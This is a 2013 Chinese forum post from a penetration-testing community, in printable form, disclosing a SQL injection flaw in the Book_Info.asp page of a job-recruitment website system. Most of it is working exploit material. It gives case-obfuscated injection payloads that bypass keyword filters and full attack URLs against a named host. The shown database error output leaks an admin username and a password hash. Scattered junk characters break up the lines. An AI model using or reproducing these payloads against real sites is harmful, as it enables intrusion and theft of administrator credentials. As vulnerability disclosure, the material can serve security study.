中国网络渗透测试联盟

标题: 网络求职招聘人才网站系统正式版漏洞 [打印本页]

作者: admin    时间: 2013-2-13 23:56
标题: 网络求职招聘人才网站系统正式版漏洞
漏洞出现在Educate/Book_Info.asp
' q" P" {! v' u9 b3 t1 @$ B此处注入点虽然过滤了一些关键字 但是我们还是可以盲注的 可以利用sqlmap跑出
! D$ r1 S5 U/ Bexp:如下
) ^/ y  }% @5 @* j, b* v查询管理账号:+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)
& H9 B1 p$ n6 S1 u查询管理密码:+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)
8 e. P2 g! B1 _: q4 o* Ohttp://jobs.0day5.com/Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)9 d" l3 {( y+ g! [3 q) P
Microsoft OLE DB Provider for SQL Server 错误 '80040e07': h+ N1 p6 {9 A
将 nvarchar 值 'hackbase' 转换为数据类型为 int 的列时发生语法错误。8 w) H; l  p- }; t- s3 V2 O
/Educate/Book_Info.asp,行 8
% j6 K9 m+ c+ D. E: x8 V4 u) thttp://jobs.0day5.com/Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)
" T+ Y, a7 P$ w5 CMicrosoft OLE DB Provider for SQL Server 错误 '80040e07'
7 _; }2 J! U$ @" j* d+ A3 F将 nvarchar 值 '165706AD8319D7F95B7FC5E82FBE8F' 转换为数据类型为 int 的列时发生语法错误。* M* a& W+ s1 D2 j2 B7 ~
/Educate/Book_Info.asp,行 8




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2